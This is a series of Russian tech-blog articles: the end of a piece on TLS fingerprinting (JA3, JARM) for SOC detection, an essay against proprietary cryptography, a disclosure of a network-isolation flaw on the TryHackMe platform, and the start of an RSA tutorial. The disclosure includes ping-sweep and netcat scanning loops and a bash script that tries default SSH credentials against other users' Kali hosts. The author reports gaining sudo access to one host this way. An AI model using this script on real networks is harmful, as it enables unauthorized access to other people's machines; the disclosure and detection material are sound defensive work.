769,451091009836191899,,,

Эти строки затем хэшируются MD5. Пример отпечатка JA3:

c8446f59cca2149cb5f56ced4b448c8d

JA3S это хэш идентификации сервера. Метод JA3S заключается в сборе десятичных значений байтов для следующих полей в пакете приветствия сервера: версия TLS, набор шифров и список расширений протоколов TLS. После сбора значений, происходит процесс объединения этих значений вместе по порядку, используя , для разграничения каждого поля и - для разграничения каждого значения в каждом поле.

Порядок полей, следующий:

TLSVersion,Cipher,Extensions

Пример:

769,47,6528101135516

Если в Server Hello нет расширений TLS, поля остаются пустыми.

Пример:

769,47,

Эти строки затем хэшируются MD5 для создания 32-символьного отпечатка пальца.

Это отпечаток JA3S:

4835b19f14997673071435cb321f5445

JA3 и JA3S это методы снятия отпечатков TLS. JA3 отслеживает способ, которым клиентское приложение обменивается данными через TLS, а JA3S отслеживает ответ сервера. Вместе они создают отпечаток криптографического согласования между клиентом и сервером.

Теперь перейдем к описанию активного метода JARM.

JARM

JARM работает, активно отправляя 10 пакетов приветствия клиента TLS на целевой сервер и фиксируя определенные атрибуты ответов приветствия сервера. Затем агрегированные ответы сервера TLS хэшируются определенным образом для получения отпечатка JARM. JARM отправляет разные версии, шифры и расширения TLS в разном порядке для сбора уникальных ответов. Хэш JARM представляет собой гибридный нечеткий хэш, он использует комбинацию обратимого и необратимого алгоритма хеширования для создания 62-символьного отпечатка.

Отпечатки JARM можно использовать:

  • убедиться, что все серверы в группе имеют одинаковую конфигурацию TLS;

  • сгруппировать разрозненные серверы в сети Интернет по конфигурации, указав, например, что сервер может принадлежать Google, Yandex или Apple;

  • определить приложения или инфраструктуру по умолчанию;

  • выявить командные центры и других вредоносные серверы в сети Интернет.

Первые 30 символов состоят из шифра и версии TLS, выбранных сервером для каждого из 10 отправленных приветствий клиента. 000 означает, что сервер отказался согласовывать приветствие с этим клиентом. Остальные 32 символа представляют собой усеченный хэш SHA256 совокупных расширений, отправленных сервером, без учета данных сертификата x509. При сравнении отпечатков JARM, если первые 30 символов совпадают, но последние 32 отличаются, это будет означать, что серверы имеют очень похожие конфигурации, принимают одинаковые версии и шифры, но используют различные расширения, что не позволяет их считать полностью идентичными.

Исторически так сложилось, что индустрия кибербезопасности была сосредоточена в основном на индикаторах компрометации (IOC) и индикаторах атаки (IOA). То есть когда вредоносное ПО/хост и т.п. будут кем-то обнаружены, исследователи или вендоры платформ TI вычленяют уникальные или не очень признаки выявленного вредоноса или атаки типа IP, домена, хэша файла и т.п. и публикуют их в чёрных списках. Проблема в том, что к этому моменту вредоносное ПО уже распространено, и специалисты ИБ автоматически переходят в оборону.

Интернет-сканирование JARM в сочетании с другими метаданными и историческим анализом даёт возможность упреждающей идентификации IOC для новых вредоносов. Например, можно сканировать Интернет с помощью JARM, сопоставлять известные результаты JARM с историей домена, IP и репутацией вместе с данными сертификата для создания черного списка. Это позволяет перейти к возможности программного создания высокоточных списков блокировки до того, как первая вредоносная программа будет распространена.

Можно использовать JARM автоматически сканируя все хосты назначения, детектируемые в сети компании, для обогащения событий, и использовать сводную таблицу, чтобы не сканировать одни и те же хосты несколько раз. Затем можно запускать запросы заведомо плохих JARM или использовать список для корреляции.

Чтобы упростить процесс, можно использовать готовое решение. В настоящее время хэши JARM умеют считать продукты Palo Alto Networks и используют их API для обогащения целевого JARM.

Примеры реализации

Если нет возможности или желания использовать готовые решения от Palo Altoи пр., можно реализовать в своей инфраструктуре свое средство мониторинга трафика, например, на основе Zeek (ранее назывался Bro) популярного open-source продукта, заточенного специально для этого.

Zeek собирает огромное количество информации из первоначального согласования TLS, т.к. оно обрабатывается в открытом виде. Таким образом, хотя мы не можем видеть всё, что связано с шифрованием TLS, мы всё же можем получить общее представление о том, что происходит.

Zeek умеет выполнять снятие отпечатков TLS с помощью хэша JA3\JA3S.

Если у нас уже есть Zeek, в него попадает трафик, то для полноценного мониторинга нам понадобится SIEM (можно обойтись и без SIEM, но тогда обрабатывать логи Zeekа придется вручную). Допустим, SIEM у нас все же есть. Помимо инструментов обработки трафика и событий Zeek нам еще потребуются списки готовых хэшей, чтобы было с чем сравнивать.

В случае в JA3 все просто. Есть готовый инструмент, к которому можно обращаться по API для проверки выявленного хэша JA3 и принятия решения нормально это или не очень.

Хэши JA3S, соответствующие вредоносам, достать чуть сложнее. Есть, например, небольшая подборка тут, есть и еще, нужно только искать или считать самостоятельно.

С хешами JARM еще немного сложнее, если у вас нет Palo Alto, их нужно собирать по разрозненным отчетам аналитиков или считать самостоятельно и вести собственные белые и черные списки. Но на github тоже попадаются тематические подборки, например, эта. Мы ее задействуем в дальнейшем при проработке правил по JARM.

Далее приведем некоторые описания правил, которые мы реализуем у себя. Также есть неплохой доклад от Splunk с примерами алгоритмов и правил мониторинга по хэшам JA3/JA3S. Доступен здесь. Правила можно адаптировать под любую SIEM.

  • Выявление признака конкретного вредоноса по хэшам JA3\JA3S. Вот, например, готовые значения для Emotet и TrickBot:

    JA3 = 4d7a28d6f2263ed61de88ca66eb011e3 (Emotet)JA3S = 80b3a14bccc8598a1f3bbe83e71f735f (C2 Server Response)JA3 = 6734f37431670b3ab4292b8f60f29984 (Trickbot)JA3S = 623de93db17d313345d7ea481e7443cf(C2 Server Response)
    
  • Выявления нового хэша JA3, ранее не появляющегося в сети.

Список клиентского ПО в любой сети, как правило, достаточно статичен, и, если появится что-то новенькое это однозначно повод разобраться. Правда, это может быть новая версия уже известного ПО, тогда ее нужно добавить в белый список.

  • Выявления хэшей JA3 не из белого списка.

Общее правило, которое позволит обратить внимание на любую активность, которая явно не помечена заранее как разрешенная. Сюда могут попасть, как новые ранее неизвестные клиентские устройства или приложения, так и вредоносы, попавшие к вам в сеть. В любом случае трекать это стоит.

  • Выявления хэшей JA3\JA3S из чёрного списка.

Это правило нацелено на выявление хэшей заведомо вредоносного ПО.

  • Выявление обращений к C&C по хэшам JARM.

При выявлении обращения к TLS-серверу, неизвестному нам или ранее не появляющемуся в логах, необходимо посчитать его JARM хэш (можно вручную, можно скриптом или с использованием SOAR), при совпадении с хэшем, соответствующим известному C&C серверу, блокируем соединение, изолируем хост и расследуем инцидент.

  • Выявление JA3 хэшей, не характерных для системы.

При появлении на хостах с Windows JA3 хэшей, характерных для Linux или смартфонов (Android/IOS), стоит обратить внимание на такие хосты. Это может являться признаком работы вредоносов (ну или запущенного эмулятора/виртуалки в режиме NAT). Кейс особенно заслуживает внимание, если выявлен на рабочей станции обычного пользователя, далекого от мира IT.

  • Выявление JA3 хэшей, характерных для разных браузеров одного семейства.

Сейчас достаточно сложно на один хост поставить две разные версии Firefox или Chrome (виртуальные машины в режиме NAT не в счёт). Такое выявление может свидетельствовать о том, что злоумышленники пытались адаптироваться под установленный софт, но после обновления софта не успели или забыли обновить свой Fingerprint. Хост лучше изолировать и провести расследование.

  • Выявление JA3 хэшей, характерных для популярных сетевых библиотек языков программирования.

Ни для кого не секрет, что сейчас ВПО пишется не только на C/C++. Часто встречаются образцы, которые написаны на Python или Golang. Стандартные библиотеки, такие как requests (для python) или http (для Golang), имеют характерные отпечатки в рамках нескольких версий. В случае выявления такого хэша на рабочем месте разработчиков, вероятно, это нормально. Но, если хэши всплывут на рабочем компьютере рядового пользователя, то точно следует провести тщательную проверку, так как с большой вероятностью это будет свидетельством активности вредоноса. Также стоит поддерживать списки актуальных JA3 хэшей для популярных сетевых библиотек, чтобы минимизировать ложные срабатывания.

Важно: Список хэшей JARM (и JA3S тоже) необходимо регулярно пополнять новыми выявленными C&C серверами, полученную самостоятельно или от сторонних исследователей.

При использовании средств защиты сети, которые умеют вычислять хэши JARM самостоятельно и на лету, соединения с серверами из черных списков можно и нужно блокировать автоматически.


В завершении хотим подчеркнуть, что развитие и популяризация технологии TLS Fingerprinting, по нашему мнению, совсем не за горами, и способствует этому внедрение TLS 1.3.

В версиях стандарта TLS до 1.3 у клиента была возможность сообщать, к какому серверу он хочет обратиться SNI (Server Name Indication). Чаще всего в HTTPS для этого использовалось поле HOST, чтобы на одном IP и порту могли работать несколько HTTPS-сайтов. Соответственно и так, без всяких fingerprint, было видно, кто куда идет. Понятно, что речь идёт про легитимные обращения, атакующие всегда могли подделать SNI.

В стандарте TLS 1.3 появилась возможность шифровать имя запрашиваемого сайта Encrypted SNI (ESNI), и безопасники потеряли возможность видеть, куда идёт обращение.

Правда ESNI уже запретили в Китае, и были попытки блокировок в России. Однако ESNI стал часто встречаться, в том числе в инструментах злоумышленников, и без TLS fingerprinting становится сложно понимать, куда происходят обращения в сети.

Авторы статьи:

Михаил Кравченко, SOC-аналитик;

Александр Минин, руководитель направления Threat Intelligence @AAMinin;

Анна Шестакова, руководитель направления мониторинга ИБ.

Подробнее..

Свой криптографический протокол опасная идея

01.06.2021 12:20:22 | Автор: admin

Разработка своей криптографии в чём-то сравнима с созданием собственного авиадвигателя, говорит эксперт по безопасности Руна Сандвик. Фото: Виталий Кузьмин

Предположим, заказчик требует разработать собственный сетевой протокол. Например, для передачи данных между сервером и мобильным приложением, для связи между микросервисами, модулями программной системы, поверх UDP или поверх TCP. С шифрованием.

Казалось бы, почему не использовать открытые стандарты типа WebSocket и JSON, зачем собственный закрытый протокол? На это обычно приводят ряд причин. Во-первых, для безопасности, чтобы его было сложнее отреверсить и никто не понял, какие данные вы передаёте. Во-вторых, для эффективности. У нас ведь уникальный случай использования, поэтому стандартные решения не самые оптимальные. Наш собственный протокол будет работать с меньшими задержками, потреблять меньше трафика и меньше расходовать батарею (на мобильных устройствах). И третья причина функции. В своём протоколе специально для нашего приложения мы реализуем уникальные возможности, каких нет ни в открытом стандарте, ни у конкурентов.

Это распространённые причины, из-за которых разрабатывают проприетарные протоколы.

Безопасность


Поговорим о безопасности.

Любой безопасник скажет, что протокол должен быть закрытым. Это важно для защиты от конкурентов. И от клиентов тоже. Чем меньше клиент знает о протоколе тем меньше он контролирует систему, приложение. Вся власть остаётся в руках разработчика. Система полностью под контролем производителя, то есть вас. Соответственно, клиент навечно привязан к вам по обслуживанию, он не сможет ничего поломать в аппаратуре или софте. Он вообще побоится туда сунуться, потому что там ничего не понятно. Всё обфусцировано, зашифровано и написано на непонятном языке. Классика.

На Хабре частенько упоминают реверс-инжиниринг протоколов в различных устройствах: автомобили, тракторы, даже машины для производства мороженого. Производители этой техники стараются скрыть технические данные ради безопасности. Чтобы глупые пользователи не совали шаловливые ручки внутрь.

Например, важной частью бизнеса многих компаний является сервис и техническое обслуживание. Поэтому некая компания, скажем, системный интегратор предпочтёт вместо стандартных Open Source решений внедрить клиенту проприетарный софт с собственным закрытым протоколом. И всё. После этого она будет доить клиента десятилетиями.

Доходит до того, что некоторые интеграторы вообще пишут уникальный софт для конкретного клиента и отправляют собственного сотрудника в штат компании-клиента. Потому что он единственный, кто умеет работать с этой программой.

В общем, проприетарный протокол кажется очень выгодным для фирмы.

Но жизнь иногда показывает обратное. А именно:

  1. Принцип безопасность через неясность не работает. Любой протокол можно отреверсить.
  2. Проприетарная реализация шифрования это очень рискованно.
  3. Никто не поможет закрыть критические дыры в закрытом софте.

Принцип безопасность через неясность не работает в криптографии


Принцип безопасность через неясность (security through obscurity) заключается в том, чтобы скрыть внутреннее устройство системы или реализацию для обеспечения безопасности.

Но в любой системе есть недостатки. В данном случае разработчик системы хочет спрятать эти недостатки, чтобы злоумышленник ими не воспользовался.

Сравните с опенсорсными системами, где разработчик специально открывает код, чтобы независимые сторонние эксперты помогли выявить и исправить эти недостатки.

В итоге получается, что собственный проприетарный протокол, максимально закрытый от посторонних глаз и обфусцированный, вовсе не увеличивает безопасность системы, а уменьшает её!


В криптографии одно из базовых правил использовать только открытые, публичные алгоритмы и протоколы. В такой системе есть лишь один секрет приватный ключ. Больше ничего. Это принцип Керкгоффса, который широко применяется в криптографии и считается практически неоспоримым.

Голландский криптограф Огюст Керкгоффс изложил правила проектирования военных шифров в книге Военная криптография (1883). Основная идея была в том, что попадание системы в руки врага не должно причинять неудобств. Поэтому ничего, кроме ключа, не должно быть секретным.

Собственная криптография


Вопрос Почему не разработать собственную криптографию? чем-то похож на вопрос Почему не спроектировать авиадвигатель?, говорит Руна Сандвик, исследователь по безопасности. Конечно, теоретически мы можем это сделать. Но это чрезвычайно сложно. Гораздо более простой и надёжный вариант выбрать готовое решение, проверенные и надёжные протоколы и алгоритмы.

Поэтому в сообществе информационной безопасности вызывает большое подозрение, если какая-то компания реализует собственный проприетарный протокол. Например, проприетарный протокол MTProto в Telegram поначалу вызвал массу критических отзывов. Взлом MTProto1.0 стал одной из самых популярных статей на Хабре в 2013 году: Безопасен ли Telegram? Или как я искал закладку в MTProto (спойлер: глупые ошибки в проприетарной криптографии).

Хотя баг быстро исправили, это наглядный пример, почему не нужно разрабатывать собственные авиадвигатели криптографические алгоритмы. Вы можете допустить ошибку а риски огромные. Люди полагаются на безопасное шифрование, от этого зависит их свобода, а иногда жизнь.

К тому же, в мессенджере запрещена анонимная регистрация без номера телефона вероятно, так удобнее коммерческой компании, чтобы блокировать спам и продвигать приложение по адресным книгам. Кто будет думать об анонимности, когда на кону миллиарды долларов прибыли? При этом Telegram изначально позиционировали именно как безопасный мессенджер (многие пользователи купились на такую рекламу).

В реальности для обеспечения анонимности нужно регистрироваться по анонимной сим-карте, но не все это понимают. См. также советы Как защитить свой аккаунт в Telegram и Практическое руководство по анонимности в онлайне.

Привязка к телефонному номеру делает пользователя уязвимым, потому что операторы сотовой связи внутри страны удобный объект для работы спецслужб.

Конечно, в опенсорсе есть свои специфические риски. Например, проблемы с сотнями зависимостей, которые вы не контролируете. Например, 20% багов в проектах на GitHub явно внесены в проекты специально, со злым умыслом. То есть вредоносными контрибуторами, которые действовали умышленно. Ещё не забыта история c мейнтейнером ESLint, который 12 июля 2018 года опубликовал вредоносные версии пакетов eslint-scope и eslint-config-eslint в репозитории npm.

Такое может случиться с каждым опенсорсным проектом, потому что мейнтейнеры работают бесплатно, на износ:


Поэтому иногда соглашаются продать свой проект (такая же история с расширениями для браузеров). А этот проект уже внедрён в качестве зависимости в тысячи других.

Но все проблемы безопасности решаемы. Независимый аудит открытого кода профессиональными экспертами лучшая гарантия его надёжности.

Кстати, в 2013 году проприетарный софт впервые обогнал опенсорсные проекты по среднему количеству багов на 1000 строк кода.


Источник: Coverity Scan Open Source Report

В прошлом веке считалось, что проприетарный софт пишут профессионалы, а Open Source любители. Сегодня же профессиональный уровень опенсорсных программ вовсе не уступает проприетарным. Может, даже превосходит их.

Возвращаясь к примеру Telegram. 5 декабря 2020 года двое итальянских математиков Марино Микулан и Никола Витоколонна опубликовали на сайте препринтов arXiv.org исследование Автоматическая символическая проверка протокола MTProto 2.0 в Telegram (вторая версия опубликована 30 апреля 2021 года, arXiv:2012.03141v1). Оно подтверждает безопасность обновлённой версии фирменного протокола MTProto 2.0.


Набор протоколов MTProto 2.0 (в голубой рамке) и область покрытия данной научной работы (светло-зелёным цветом). Схема из научной статьи Марино Микулана и Никола Витоколонны, arXiv:2012.03141v1

Статья содержит полностью автоматизированное доказательство надёжности аутентификации MTProto 2.0, обычного чата, зашифрованного end-to-end чата и механизмов повторного ввода ключей в отношении нескольких свойств безопасности, включая аутентификацию, целостность, конфиденциальность и совершенную прямую секретность, а также доказывает формальную корректность MTProto 2.0.


Протокол аутентификации MTProto 2.0. Здесь $\{m\}_{pk}$ означает асимметричное шифрование $m$ открытым ключом $pk$. В свою очередь, $\{m\}_{(k,iv)}$ означает симметричное шифрование общим ключом $k$ с вектором инициализации $iv$. Схема из научной статьи


Слегка упрощённая версия протокола MTProto 2.0 для секретных чатов. Все сообщения перенаправляются через сервер $S$: каждое сообщение между $X \in \{A, B \}$ и $S$ шифруется с использованием ключа авторизации $X$ (здесь не показан). Обратите внимание, что $g_{ab}$, $k$ и $iv$ не известны серверу $S$. Схема из научной статьи



Эта математическая работа чуть ослабила озабоченность экспертов по поводу проприетарного протокола MTProto2.0. Редкий случай, когда собственная нестандартная криптографическая система (пока) работает надёжно. В ней ещё не нашли таких фатальных уязвимостей, как в MTProto 1.0.

Неужели разработчики Telegram всё-таки научились и смогли сделать уникальный авиадвигатель без ошибок? Можно только порадоваться за них, ведь все пользователи Telegram участвовали в этом обучении как бета-тестеры. В каком-то смысле это наш общий успех.



На правах рекламы


Наша компания предлагает серверы с Linux или Windows. Не экономим на железе только современное оборудование и одни из лучших дата-центров в России и ЕС. Поспешите проверить!

Присоединяйтесь к нашему чату в Telegram.

Подробнее..

Hack Me на TryHackMe, или Небезопасное изучение инфобеза на известной платформе

15.06.2021 16:19:06 | Автор: admin

Привет, Хабрчане. Сегодня мы поговорим об одной проблеме, которую обнаружил мой хороший знакомый Иван Глинкин.

Это очень серьезный косяк с безопасностью платформы для обучения пентесту TryHackMe. Заключается он в том, что виртуальные стенды видят абсолютно все в сети, и их можно использовать для атаки на пользователей сервиса.

Написать эту статью меня подтолкнули 3 причины:

  1. Прошло уже более двух недель, а воз и ныне там. Никаких действий со стороны платформы TryHackMe не последовало;

  2. Платформа ответила только хамством, а затем забанила аккаунт Ивана (об этом далее);

  3. Автору оригинала очень лень переписывать статью на русском языке.

DSCLAIMER

Эта уязвимость была изначально найдена не мной, но я получил у автора оригинала разрешение на использование материалов оригинальной статьи и публикацию на русском языке. И уже я перепроверял, что конь всё ещё не валялся в системе инфобеза платформы TryHackMe, и использовать ее, мягко говоря, не очень безопасно. Ссылка на оригинальную статью.

Завязка сюжета

Есть много разных платформ для обучения инфобезу. И коль скоро эти платформы затрагивают такой важный в IT-отрасли сегмент, то неплохо было бы им самим соответствовать. Так мы думаем, когда заходим на них.

Однако, как показала практика, тут тоже работает славный принцип х*як, х*як, и в продакшн.

Когда мы подключаемся по VPN к платформе, мы не можем взаимодействовать с другими хостами в сети, кроме самих виртуальных машин для взлома. Верно? Верно!

Ну, а что по поводу самих виртуальных стендов? Они-то, наверное, тоже не могут взаимодействовать с кем попало?

А вот и нет! Виртуальный стенд, как оказалось, видит всех и вся в сети.

В качестве тестовой точки я выбрал виртуалку Basic Pentesting.

В роли атакующего у нас ...В роли атакующего у нас ...

Быстренько получив пользователя kay по сюжету виртуалки, начнем проверять, как же TryHackMe решила проблему с тем, что виртуалка может взаимодействовать с абсолютно всеми пользователями. Проверяем свою же подсеть. В моем случае это была 10.9.5.0

for ip in {1..254}; do ping -w 1 10.9.5.$ip | grep -i "ttl"; done
Ищем живых соседейИщем живых соседей

Жизнь есть. Так, а другие подсети видим? Ну, например, 10.9.4.0

Ищем ещеИщем еще

Видим ...

Так, отставить панику! Это же еще ничего не доказывает и не значит, что я смогу подключиться по SSH или проверить, есть ли там поднятый Apache.

Сводим все живые IP адреса в вордлист и пробегаем их nc по 80 порту, благо nc заботливо установлен админами платформы.

for ip in $(cat ips.txt); do nc -nvw 1 $ip 80; done
Ищем открытый 80 портИщем открытый 80 порт

А вот и первые претенденты. CURLлуем 10.9.4.252 и видим там типичный листинг директории www человека, который решает виртуалки:

Уверен, что у многих директория веб-сервера на Kali выглядит примерно такжеУверен, что у многих директория веб-сервера на Kali выглядит примерно также

Кульминация

А вот давайте и проверим, че там по SSH. Тут тоже применим немножко автоматизации. Закидываем на стенд sshpass, благо и curl, и wget уже заботливо установлены админами платформы заранее. Как говорится, всё для вас, даже вода из-под крана.

Опа! Не ставится.

Прав нет. А если найду?Прав нет. А если найду?

Ну root-то точно на стенде закрыт! Для итогового выполнения упражнения стенда root не нужен, а, стало быть, и у пользователя kay не должно быть прав на sudo. Верно же?

Ну, тут даже без комментариев Ну, тут даже без комментариев

Устанавливаем sshpass и колдуем легкий скрипт в bash для перебора:

#!/bin/bashfor ip in {2..255}do ip_check=$(ping -w 1 10.9.5.$ip | grep -i "icmp_seq" | cut -d " " -f 4 | cut -d ":" -f 1)if [ ! -z $ip_check ]thenecho -e "\e[01;32mHost $ip_check is up. Cheking SSH\e[00m";nc -vz -w 2 $ip_check 22 > log.txt 2>&1;ssh_refused=$(grep -o "refused" log.txt)ssh_timeout=$(grep -o "timed" log.txt)if [ ! -z $ssh_refused ]thenecho -e "\e[01;31mSSH is closed. Going further. \e[00m";echo " ";elif [ ! -z $ssh_timeout ]thenecho -e "\e[01;31mSSH doesn't respond. Going further. \e[00m";echo " ";elseecho -e "\e[01;32mSSH is open. Trying to connect... \e[00m";sshpass -p "kali" ssh -o StrictHostKeyChecking=no kali@$ip_check;sshpass -p "toor" ssh -o StrictHostKeyChecking=no user@$ip_check;sshpass -p "toor" ssh -o StrictHostKeyChecking=no root@$ip_check;echo " ";fifidonerm log.txt;echo -e "\e[01;32mEnumeration has been finished! \e[00m";

Развязка

Проверять будем 3 самые основные связки логин/пароль для Kali и Parrot OS:

  • kali:kali

  • root:toor

  • user:toor

ПОЕХАЛИ!ПОЕХАЛИ!

А вот и первый БЕЗОПАСНИК с дефолтными логином и паролем. И сразу натыкаемся на ovpn файл для доступа к TryHackMe. Если у человека оплачен VIP, то мы только что сэкономили на подписке

Привет привет ovpn файлПривет привет ovpn файл

Пробуем sudo

Ну как бы вот ...Ну как бы вот ...

Эпилог

Какие из всего этого следуют практические выводы?

Ну, самый очевидный: система инфобеза TryHackMe полное **** нужно менять дефолтные пароли на своих Kali и Parrot OS на более безопасные. Обезопасит ли это в полной мере вас при вот таком вот уровне защиты сети на платформе TryHackMe? Определённо нет.

Думаю, мне не стоит тут перечислять, что, помимо простого брутфорса SSH, существует еще куча методов получить доступ к вашей системе. А дальше можете выбрать, что злоумышленник захочет:

  1. Включить вашу рабочую машину в ботнет;

  2. Покопаться во внутрикорпоративной сети компании и вашей личной инфе;

  3. Провести атаки на другие ресурсы с использованием вашей пентест-машины и из-под вашего IP;

  4. Помайнить криптовалюты на вашем оборудовании (а почему бы, собственно, и нет?);

  5. Всё, что пришло вам в голову к этому моменту

А также не забываем, что после перезагрузки стенда вся информация с него удаляется, в том числе и логи. Можно, конечно, уповать на то, что у TryHackMe всё обязательно логируется и записывается, особенно все действия пользователя на виртуалках, но что-то мне мало верится в реальность этого варианта.

Особенно меня порадовала реакция платформы TryHackMe на багрепорт всей этой ситуации.

Первичный отчет был направлен в TryHackMe 2 мая 2021. Оригинальная статья вышла 25 мая 2021. Вместо того, чтобы заняться решением этой проблемы, руководство платформы TryHackMe прислало письмо, в котором просто решило прикрыться пунктом 9 правил пользования платформой.

TryHackMe на полном серьёзе считает, что всё у них нормально, и что вместо принятия технических мер можно ограничиться вот этой вот писулькой в правилах пользования платформой. Она как-то сможет оградить пользователей от реальных злоумышленников?

Ну и вишенка на торте:

Бан аккаунта. Отличная работа, TryHackMe. Вместо решения проблемы вы просто забанили человека, который указал вам на косяк в системе инфобеза

Решайте сами, стоит ли пользоваться вот такими образовательными порталами, которые спокойно позволяют взламывать своих пользователей.

Лично моё мнение: в случае реальной атаки на вас платформа просто открестится от ответственности всё тем же замечательным пунктом 9 своего соглашения.

Ну а что? Это же не платформа положила болт на защиту пользователей, а злоумышленник, наплевав на все писульки TryHackMe, просто взял и использовал ваш Kali для противоправных действий в адрес третьих лиц.

Подробнее..

Молчание золото доказательство существования Гамильтонова цикла в графе

09.12.2020 20:22:50 | Автор: admin

Ульям Гамильтонпридумал множество игр, одна из них - задача кругосветного путешествия пододекаэдру. В ней вершины додекаэдра носили названия известных городов, а рёбрами былисоединяющие их дороги. Игрок должен был совершить путешествие вокруг света, найдя дорогу, которая проходит через все вершины ровно один раз.

Заменив такую сложную конструкцию плоским графом, изоморфным исходному, получим задачу, которую далее рассмотримв системе протоколов с нулевым разглашением.

Доказательство с нулевым разглашением

Пусть существует некоторая теорема и две стороны - доказывающая и проверяющая. Первой стороне необходимо убедить вторую в истинности данного утверждения, не открывая при этом никакой другой информации. Таким образом, можно сказать, что передается нулевое знание фактического доказательства теоремы.

Очень убедительное (но не абсолютно определенное) свидетельство, что теорема верна, и что доказывающий знает это самое доказательство, дает интерактивный вероятностный протокол, называющийся доказательством с нулевым разглашением.

Интерактивность в данном определении говорит о том, что стороны общаются в течение нескольких раундов. В стандартных математических доказательствах имеет место только один вид взаимодействия: доказывающий дает проверяющему доказательство "на проверку", и на этом все заканчивается. В нашем же случае процесс доказательства утверждения превращается в разговор, который заканчивается убеждением проверяющего (если все идет хорошо).

Доказательства с нулевым разглашением не являются доказательствами вматематическом смыслеэтого термина, потому что есть некоторая небольшая вероятность, что обманом доказывающий сможет убедить проверяющего в ложном утверждении, хотя она и будет приближаться к 0 по мере увеличения числа этапов взаимодействия. С другой стороны, протокол абсолютно - а не только вероятно - гарантирует доказывающему, что проверяющему не разглашается ни намека на доказательство.

Как убедить кого-то в существовании Гамильтонова цикла, не раскрывая сам цикл

Пусть обеим сторонам известен некоторый граф G = (E, V) , вершины которого пронумерованы от 1 до V . Необходимо доказать проверяющему существование цикла в G, который посещает каждую вершину ровно один раз.

На вход системе с нулевым разглашением мы подаем(G, k), где k - положительное целое число, которое играет роль параметра безопасности и является количеством последовательных взаимодействий между сторонами: чем больше k , тем больше уверенность проверяющего в доказательстве.

Дальнейшие шаги будут выполнятьсяk раз.

Доказывающая сторона выбирает случайную перестановку чисел \{1,...,|V|\} и рисует матрицу смежности для графа, помечая строки и столбцы в соответствии с этой перестановкой. Получается новый граф, изоморфный исходному, построенный по данной матрице, если бы нумерация строк и столбцов у нее шла в естественном порядке.

Проще говоря, мы шифруем исходный граф в изоморфный ему.

Приватное состояние матрицы, доступное только доказывающей стороне.Приватное состояние матрицы, доступное только доказывающей стороне.Публичное состояние матрицы, известное обеим сторонам.Публичное состояние матрицы, известное обеим сторонам.

Проверяющая сторона получает скрытую матрицу и делает выбор:

  • Попросить доказывающую сторону открыть2|V|сетки, соответствующих краям цикла Гамильтона. Процесс раскрытия симметричен: если показана запись \{i, j\} в матрице, доказывающая сторона должна также показать запись\{j, i\}.

  • C другой стороны, можно попросить доказывающую сторону открыть граф целиком.

Результат для проверяющей стороны в первом случае будет выглядеть, например, так:

Наличие 1 во всех открытых квадратах доказывает существование цикла Гамильтона в графе.

Еслиу проверяющего была бы возможность задавать только первый вопрос,доказывающий мог бы его легко обмануть, и, не зная Гамильтонова цикла исходного графаG, мог бы подменить его на другой с тем же количеством вершин, в котором сам знал бы цикл. Короче говоря, проверяющий благодаря второму вопросу, хочет убедиться в том, что рассматриваемый граф действительно изоморфен исходному.

Выбор того, что проверяющий будет просить у доказывающего, на каждом шаге определяется "подбрасыванием монетки".

В итоге проверяющая сторона либо поверит доказательству, либо отклонит его.

Почему это - нулевое знание?

Докажем, что проверяющая сторона, благодаря разговору, не может получить никакой "лишней" информации.

Может показаться, что ответ на первый вопрос предоставляет проверяющему знание, благодаря которому он способен самостоятельно полностью узнать доказательство.

Это было бы верно, если бы он знал перестановку вершин,переводящую шифрованный графв исходный, но поскольку вопросы задаются по одному,и каждый раз изоморфная копияGменяется,то найти перестановкудело безнадёжноеэто значило бы решить проблему изоморфизма графов.

С другой стороны, ответ на второй вопрос, очевидно, не даст проверяющему никакой информации, так как, он получает изоморфную копию графаG , но мог бы и самостоятельно построить их сколько угодно,переставляя вершины исходного графа.

Что и требовалось доказать.

Заключение

Рассмотрим задачу идентификации личности. Если решать ее простым использованием пароля, то гарантия того, что он не попадет в руки злоумышленников, не очень велика. Поэтому на арену врывается протокол, описанный выше, работая по принципу "я знаю только половину информации".

Конечно,при таком условии нельзя быть абсолютно уверенным в том,что идентификация личности будет стопроцентной.Но проверяющий каждый раз может спросить любую часть информации,причём несколько раз.К тому же, можно использовать при этом Гамильтоновы циклы,получая очень надёжную систему доступа.

Материал подготовлен при использовании литературы:

Manuel Blum "How to Prove a Theorem So No One Else Can Claim It"

Шнайер Б. Прикладная криптография, 2-е издание: протоколы, алгоритмы, исходные тексты на языке Си //Под редакцией ПВ Семьянова. М., Триумф. 2002.

Подробнее..

RSA от простых чисел до электронной подписи

20.12.2020 14:04:58 | Автор: admin

Получаем свою первую электронную подпись по алгоритму RSA.

Содержание
  1. Введение

  2. Определения и обозначения

  3. Описание криптосистемы RSA

    1. Асимметричные криптографические системы

    2. Генерация ключей

    3. Шифрование и дешифрование

    4. Получение подписи сообщения по RSA

  4. Электронная подпись документов

  5. Заключение

Введение

Наверняка вы сталкивались с таким понятием, как "электронная подпись". Если обратиться к федеральному закону, то можно найти следующее её определение:

Электронная подпись - информация в электронной форме, которая присоединена к другой информации в электронной форме (подписываемой информации) или иным образом связана с такой информацией и которая используется для определения лица, подписывающего информацию

Для меня, как для человека, редко работающего с подобного рода документами, определение несколько абстрактное, хоть и отражает суть ЭП - определение лица, подписавшего некоторый документ. Помимо этого, ЭП может быть использована для определения искажений переданного сообщения, в чём мы сможем убедиться позднее.

Задача ЭП ясна, теперь хотелось бы увидеть и прочувствовать, что именно скрывается за этими двумя словами. Копаясь дальше в гугле, можно найти довольно много различных алгоритмов создания цифровой подписи (DSA, ГОСТ Р 34.10-2012, RSA-PSS и т.д.), разбираться в которых неподготовленному пользователю сложно.

Спасти эту ситуацию и помочь разобраться в том, что есть ЭП, может криптосистема RSA, разработанная Ривестом, Шамиром и Адлеманом в 1978 году. Она не загромождена безумным количеством алгоритмов и основывается на относительно простой математике. В связи с этим можно шаг за шагом прийти от модульной арифметики к алгоритму создания электронной подписи, чему я и хочу посвятить данную статью.

Теорминимум

(На картинке изображён Лев Ландау, автор теорминимума)(На картинке изображён Лев Ландау, автор теорминимума)

Сформируем небольшой словарик терминов, которые нам пригодятся далее:

  • Открытый текст данные, подлежащие шифрованию или полученные в результате расшифрования

  • Шифртекст данные, полученные в результате применения шифра к открытому тексту

  • Шифр совокупность обратимых преобразований, зависящая от некоторого параметра (ключа)

  • Ключ параметр шифра, определяющий выбор одного преобразования из совокупности.

  • Факторизация процесс разложения числа на простые множители.

  • НОД наибольший общий делитель.

  • Числа a и b называются взаимно простыми, если НОД этих чисел равен 1.

